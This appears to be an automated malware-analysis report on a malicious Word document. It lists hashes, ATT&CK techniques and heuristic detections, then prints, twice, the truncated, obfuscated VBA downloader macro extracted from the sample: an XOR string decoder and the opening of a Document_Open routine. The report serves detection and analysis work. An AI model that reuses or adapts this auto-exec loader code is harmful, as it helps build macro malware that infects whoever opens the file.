Office (OLE) malware analysis — malicious · cd2f263c243e941b

MALICIOUS

Office (OLE)

221.5 KB Created: 2015-11-21 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: aa733b8c49cef104810282029b572fde SHA-1: 33405c4939d5a7786b33e31b2f7e803cc240e061 SHA-256: cd2f263c243e941bf91b291619a898660b222b29618dabbdcd82905db32b3a58

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a heavily obfuscated VBA macro that is triggered by the Document_Open event. This macro utilizes CreateObject to execute code, a common technique for downloading and running secondary payloads. The ClamAV detection name 'Doc.Downloader.Generic-6707072-0' further supports the downloader functionality.

Heuristics 8

ClamAV: Doc.Downloader.Generic-6707072-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6707072-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16338 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16338 bytes
SHA-256: `2eb5cbf17641183641f05caa525dc8ba4d0e8c47f932564cd28e9e480466f199`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long #Else Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long #End If Private GpkKWN3 As String Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String PevSFR3rv0e2RZK = 39 If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then MJDM0hu5rU7Tdb = 1 + 18 '19 Clra 16 25 End If MJDM0hu5rU7Tdb = 69 '82 96 55 EHgu On Error Resume Next SQoiCuInevSFR3rv0 = 82 If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then NsNJTqkk3w = 72 + 29 '32 GvriOI9 94 34 End If NsNJTqkk3w = 44 '59 39 1 HSHSe4Iv Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean It9Acrpc7M = 30 If It9Acrpc7M + DrjiAY5ezWAm > 1 Then DrjiAY5ezWAm = 53 + 31 '26 RCZpY 14 49 End If DrjiAY5ezWAm = 44 '87 56 76 HPqsPooeMN9zRPs3 GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1)) VwkYpXxUG = 28 If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then L7MtzHaiOhvKV = 60 + 12 '10 HbZCtRcd4hpmvGrNO 41 22 End If L7MtzHaiOhvKV = 27 '11 59 15 IlWZ1yGPfpiG CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5)) C1aZX3huwbllRm = 94 If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then Orcx0psolAwdff4 = 49 + 58 '84 SgJEI38zx 78 45 End If Orcx0psolAwdff4 = 71 '20 20 72 TmV0hQRiff Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg) FXBI0cjkxDlMD = 32 If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then CJqQ7WXZNbh3E = 10 + 5 '92 Fh3vFSWMRoJaMPe 28 22 End If CJqQ7WXZNbh3E = 66 '8 55 66 TytC1onRx For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7) Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Next NyTk5LjHttv For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2) Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7) Next NyTk5LjHttv For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8) Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv) Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)) Next NyTk5LjHttv L8aV9L4vUWh = False L7j2iquXfw8f = 0 HlgcUkRQ3VZtHDYq = 0 For NyTk5LjHttv = 0 To UBound(GJE0Xk) If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0 If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh) If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh) GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f))) L7j2iquXfw8f = L7j2iquXfw8f + 1 HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1 Next NyTk5LjHttv WuyDMqJlc9EExGn = 95 If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then MD6vOtbeXg08Apf = 46 + 67 '56 FRKdQgv8nI4s 91 59 End If MD6vOtbeXg08Apf = 3 '71 91 4 Dr9gJTFhJbaTyvr N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6)) PQtmFj4 = 59 If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then Jy5AeFk8EPh5 = 81 + 87 '16 Y28Ireu 57 60 End If Jy5AeFk8EPh5 = 78 '97 87 44 QSITYPlOzd9wZo5wK End Function Sub Document_Open() Y8zxt6Msdpa = 73 If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then IffQgv8nI4s = 85 + 23 '38 NlQBbSx8CvjG5n 18 78 End If IffQgv8nI4s = 69 '70 67 77 SK2Okf9 On Error Resume Next PKaAwdff4 = 59 If PKaAwdff4 + UGTAOx > 1 Then UGTAOx = 3 + 71 '91 BpX8trlI24f 4 95 End If UGTAOx = 18 '51 79 94 Seuq3p2oT0 Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long Pn2j04QQZ = 39 If Pn2j04QQZ + PhB4lG17FG95 > 1 Then PhB4lG17FG95 = 15 + 88 '41 WCYB5Gg 83 81 End If PhB4lG17FG95 = 35 '33 ... (truncated)

SHA-256: 2eb5cbf17641183641f05caa525dc8ba4d0e8c47f932564cd28e9e480466f199

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
#Else
Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
#End If
Private GpkKWN3 As String
Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
PevSFR3rv0e2RZK = 39
If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
MJDM0hu5rU7Tdb = 1 + 18
'19 Clra 16 25
End If
MJDM0hu5rU7Tdb = 69
'82 96 55 EHgu
On Error Resume Next
SQoiCuInevSFR3rv0 = 82
If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
NsNJTqkk3w = 72 + 29
'32 GvriOI9 94 34
End If
NsNJTqkk3w = 44
'59 39 1 HSHSe4Iv
Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
It9Acrpc7M = 30
If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
DrjiAY5ezWAm = 53 + 31
'26 RCZpY 14 49
End If
DrjiAY5ezWAm = 44
'87 56 76 HPqsPooeMN9zRPs3
GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
VwkYpXxUG = 28
If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
L7MtzHaiOhvKV = 60 + 12
'10 HbZCtRcd4hpmvGrNO 41 22
End If
L7MtzHaiOhvKV = 27
'11 59 15 IlWZ1yGPfpiG
CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
C1aZX3huwbllRm = 94
If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
Orcx0psolAwdff4 = 49 + 58
'84 SgJEI38zx 78 45
End If
Orcx0psolAwdff4 = 71
'20 20 72 TmV0hQRiff
Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
FXBI0cjkxDlMD = 32
If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
CJqQ7WXZNbh3E = 10 + 5
'92 Fh3vFSWMRoJaMPe 28 22
End If
CJqQ7WXZNbh3E = 66
'8 55 66 TytC1onRx
For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
Next NyTk5LjHttv
For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
Next NyTk5LjHttv
For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
Next NyTk5LjHttv
L8aV9L4vUWh = False
L7j2iquXfw8f = 0
HlgcUkRQ3VZtHDYq = 0
For NyTk5LjHttv = 0 To UBound(GJE0Xk)
If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
L7j2iquXfw8f = L7j2iquXfw8f + 1
HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
Next NyTk5LjHttv
WuyDMqJlc9EExGn = 95
If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
MD6vOtbeXg08Apf = 46 + 67
'56 FRKdQgv8nI4s 91 59
End If
MD6vOtbeXg08Apf = 3
'71 91 4 Dr9gJTFhJbaTyvr
N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
PQtmFj4 = 59
If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
Jy5AeFk8EPh5 = 81 + 87
'16 Y28Ireu 57 60
End If
Jy5AeFk8EPh5 = 78
'97 87 44 QSITYPlOzd9wZo5wK
End Function
Sub Document_Open()
Y8zxt6Msdpa = 73
If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
IffQgv8nI4s = 85 + 23
'38 NlQBbSx8CvjG5n 18 78
End If
IffQgv8nI4s = 69
'70 67 77 SK2Okf9
On Error Resume Next
PKaAwdff4 = 59
If PKaAwdff4 + UGTAOx > 1 Then
UGTAOx = 3 + 71
'91 BpX8trlI24f 4 95
End If
UGTAOx = 18
'51 79 94 Seuq3p2oT0
Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
Pn2j04QQZ = 39
If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
PhB4lG17FG95 = 15 + 88
'41 WCYB5Gg 83 81
End If
PhB4lG17FG95 = 35
'33 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.